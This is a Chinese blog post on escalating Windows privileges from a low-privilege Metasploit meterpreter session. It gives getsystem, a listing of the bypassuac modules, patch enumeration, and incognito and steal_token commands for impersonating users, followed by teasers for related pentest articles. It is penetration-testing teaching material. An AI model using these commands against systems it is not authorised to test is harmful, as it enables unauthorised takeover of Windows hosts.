内网渗透-权限提升(使用MSF提权的一些方法)

最新推荐文章于 2024-08-06 10:19:57 发布
最新推荐文章于 2024-08-06 10:19:57 发布
阅读量3.3k 收藏 10
点赞数 2
分类专栏: 内网渗透 系统提权 安全工具 文章标签: 网络渗透 权限提升 内网渗透 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Ping_Pig/article/details/107113745
版权

讲在前面:提权方法有很多种和,这里提供在利用MSF拿到低权限用户后利用MSF提权的办法,认真看好吗弟弟!!!

其他提权方法

1.直接输入提升权限命令

meterpreter>getsystem

2.使用MSF内置bypassuac提权

MSF内置有多个bypassuac模块,原理有所不同,使用方法类似,运行后返回一个新会话后再次执行getsystem获取系统权限。

search bypassuac

Matching Modules
================

   #  Name                                              Disclosure Date  Rank       Check  Description
   -  ----                                              ---------------  ----       -----  -----------
   1  exploit/windows/local/bypassuac                   2010-12-31       excellent  No     Windows Escalate UAC Protection Bypass
   2  exploit/windows/local/bypassuac_comhijack         1900-01-01       excellent  Yes    Windows Escalate UAC Protection Bypass (Via COM Handler Hijack)
   3  exploit/windows/local/bypassuac_eventvwr          2016-08-15       excellent  Yes    Windows Escalate UAC Protection Bypass (Via Eventvwr Registry Key)
   4  exploit/windows/local/bypassuac_fodhelper         2017-05-12       excellent  Yes    Windows UAC Protection Bypass (Via FodHelper Registry Key)
   5  exploit/windows/local/bypassuac_injection         2010-12-31       excellent  No     Windows Escalate UAC Protection Bypass (In Memory Injection)
   6  exploit/windows/local/bypassuac_injection_winsxs  2017-04-06       excellent  No     Windows Escalate UAC Protection Bypass (In Memory Injection) abusing WinSXS
   7  exploit/windows/local/bypassuac_sluihijack        2018-01-15       excellent  Yes    Windows UAC Protection Bypass (Via Slui File Handler Hijack)
   8  exploit/windows/local/bypassuac_vbs               2015-08-22       excellent  No     Windows Escalate UAC Protection Bypass (ScriptHost Vulnerability)

使用MSF的enum_patches模块,收集补丁信息,然后查找可用exploits进行提权

自行根据不同的补丁所存在的漏洞使用msf存在的脚本进行权限提升

3.令牌操作

incognito假冒令牌

use incognito   #help incognito 查看帮助

list_tokens -u  #查看可用的token

impersonate_token PIG\\testpig或者impersonate_token 'PIG\testpig' #假冒testpig的token,不加单引号需使用\\

execute -f cmd.exe -i -t      #  -t 使用假冒的token执行cmd.exe,亦可以直接输入shell进入当前token的终端

rev2self  #返回原始token

steal_token窃取令牌

steal_token <pid值>    #从指定进程中窃取token,先ps列出进程详细信息

drop_token                  #删除窃取的token

 

Ping_Pig
关注
专栏目录
48-5 内网渗透 - JuicyPotato、Pipe Potato提权
weixin_43263566的博客
06-22 145
运行 JuicyPotato,将获取 SYSTEM 权限并运行指定的攻击载荷(先使用 MetaSploit 监听),成功获取到一个 SYSTEM 权限的 Meterpreter。程序,这里我就直接用蚁剑上传了,如果是实际环境中我们就是通过一些漏洞或钓鱼上线蚁剑,之前的文章我们就是通过命令执行漏洞上线的蚁剑,这里就不重复了。那样依赖于一个现有的 Meterpreter,并且可以自定义 COM 对象加载的端口,以及根据系统版本更换可用的 COM 对象。中使用的 COM 对象为 BITS,而。
49-3 内网渗透 - MSI安 装策略提权
weixin_43263566的博客
06-26 197
MSI安装策略提权是一种利用Windows操作系统的MSI(Microsoft Installer)安装策略配置漏洞的方法。在配置中启用了"永远以高特权进行安装"选项(AlwaysInstallElevated,默认情况下为禁用状态),允许任何用户以SYSTEM权限安装MSI程序。攻击者可以利用此漏洞,在目标主机上安装恶意预先制作的MSI文件,以获取SYSTEM权限。MSI全称为Microsoft Installer,它是微软的应用程序安装包格式,实质上是一个包含安装和卸载软件所需指令和数据的数据库。
内网渗透-权限提升
weixin_60329395的博客
08-26 1311
权限提升流程:信息收集-补丁筛选-利用MSF或特定EXP-西瓜到手漏洞库推荐:Vulmap、Wes、WindowsVulnScanwindows-exp-suggester在17年后未更新,不再推荐Vulmap是PowerShell脚本,使用最简单,但web提权往往只能有cmd窗口,不一定有PowerShell环境,导致该项目对Windows系统不友好Wes和WindowsVulnScan是python脚本,可以不借助PowerShell操作,更适用于web提权。...
内网渗透常用提权方式总结
j1044957016的博客
06-01 7561
内网菜鸡艰难学习,希望一样的菜鸡能省去打开一堆链接的时间吧
使用MSF进行提权(windows提权、linux提权、wesng使用
最新发布
2401_85773496的博客
08-06 857
内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…不断更新大量的Exploit程序和报告,它的搜索功能可以搜索整个网站内容。网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。选定需要使用的攻击模块之后,你只需要使用简单的命令配置一些参数就能完成针对一个漏洞的测试和利用,将渗透的过程自动化、简单化。
内网渗透 - 提权 - Windows
weixin_30855099的博客
08-22 268
MS提权 MS16-135 MS16-016 提权框架 Sherlock 信息收集 ifconfig -a cat /etc/hosts arp -a route -n cat /proc/net/* ping扫描 跳板机环境分析 1.具备公网IP,所有端口可直接连接,且可访问外网 - 即可使用正向连接,又可以使用反向连接 2.跳板机受...
关于内网渗透提权问题
weixin_48421613的博客
06-02 857
最近有小老弟问我,总有面试官问关于提权的问题,总是能把我难住。好吧,面试造航母干活 拧螺丝这句话在哪里都很实用,索性今天也就写一下我认为的提权。 首先呢,其实权限提升这种事情多用于内网渗透,这里指的内网渗透当然不是你处于内网环境的渗透测试,而是那种在攻防演练、护网、打击境外的一些特殊场景,由外网入侵到内网做后渗透的时候遇到的权限提升问题。(大佬勿喷,我实在想不到还有哪里做提权,正常安全评估是完全用不到这一项技能的,毕竟传统工艺点到为止) 什么是提权 主要针对在对网站的渗透过程中,通过利用网站或服务器系.
网络安全内网渗透(二):权限提升
wuli1024的博客
01-06 1172
本文将会介绍,主要通过三种方式:提高程序运行级别,UAC 绕过,利用提权漏洞进行提权
红队内网攻防渗透内网渗透之windows内网权限提升技术:哥斯拉&MSF&CS
HACKONE的博客
05-30 487
虚拟化:Docker,ESXi,QEMU,Hyper-V等。jsp由于机制的原因不需要提权,一般拿到的权限就是最高权限。目前的msf版本有bug可以TB上购买pro版本嘎嘎稳。集成软件:宝塔,PhpStudy,XAMMP等。ASP/ASP.NET/PHP/JSP等。全自动:快速识别系统中可能被利用的漏洞。自行搭建:自己一个个下载安装搭建配置。集成软件,自行搭建,虚拟化等。执行不了命令,所以需要提权
49-4 内网渗透 - 不安全的服务权限提权
weixin_43263566的博客
06-28 285
例如,下图展示了 phpStudySrv 服务的注册表信息,其中的 ImagePath 键指向该系统服务启动的二进制程序。如果能够让服务在启动时执行其他程序,那么这些程序也将以系统权限运行,这就是利用系统服务进行提权的核心思。,例如不安全的服务权限设置、服务注册表权限不当、服务路径可控制、以及未引用的服务路径等问题。该工具能够枚举目标主机上存在权限缺陷的系统服务,并显示特定用户或组对这些服务的访问权限。如果配置系统服务时存在疏忽,可能会导致低权限用户拥有对高权限系统服务的更改配置权限
48-4 内网渗透 - Rotten Potato(烂土豆) 提权
weixin_43263566的博客
06-21 390
渗透测试中,Potato家族是一种常用的提权技术,主要利用Windows服务账户的特权来将已获取的权限提升至系统(SYSTEM)级别。具体而言,Potato家族的攻击方式是将已获得的NT AUTHORITY\SYSTEM账户的访问令牌传递给CreateProcessWithTokenW或CreateProcessAsUserA函数,从而在SYSTEM账户的上下文中启动新进程,从而实现权限提升。,这篇文章介绍的提权方式跟之前最大的优势就是可以通过。,上一篇文章介绍的只能在管理员权限的基础上提升
内网渗透--linux提权
hee_mee的博客
07-28 503
zeroNIl
内网渗透(二)之提权
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
11-14 5801
对于内网渗透,到我们拿到了公网主机的权限后,并获得了一些本机的信息时。我们首先得知道我们的权限。如果获取到的是普通用户权限,则我们需要想办法提权至管理员权限。如果获得的已经是管理员权限,则可以忽略这一步。对于Windows系统,只有提权到管理员权限后,才可以运行mimikatz以及执行一些其他高权限的操作。对于Linux系统,很多命令需要root权限才能执行,只有提权到root权限才能执行后面的信息收集等工作。
内网渗透基石篇--权限提升(上)
qq_44005305的博客
07-31 298
本文主要从内网权限提升出发,主要介绍一些低权限用户如何通过一些工具和脚本来获取一些高权限。中间介绍了一些脚本和工具的使用,还做了几个实验来理解这些工具。通过网络共享可以访问到GPP的组策略的文件:[外链图片转存中…(img-WNkpjcL6-1690719347064)]打开可以看到存储的cpasword密码:[外链图片转存中…(img-xMcpcTd4-1690719347066)]六、 针对组策略首选项提取的防御措施1.设置共享文件夹SYSVOL的访问权限
渗透测试-权限提升
weixin_46626737的博客
03-13 508
比如:C://program files/a.exe -f,windows识别到空格,认为后面是参数,正确的应该是”C://program files/a.exe“ -f。命令问题:利用tar压缩,文件名改为--参数类型,从而执行 ,利用定时任务,和SUID(其他命令也可,换文件名-参数)先获得webshell,然后进行上传一些文件,进行测试提权msf或者手动的EXP),然后创建用户,开启端口,远程连接。假如在C://加一个program恶意文件exe后缀,再次执行,则该恶意文件会被执行。
[渗透测试]—7.3 内网渗透提权技术
wuli1024的博客
01-08 1234
内网渗透是指攻击者在成功进入目标网络后,对内部资源进行横向渗透以获取更多权限和信息的过程。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值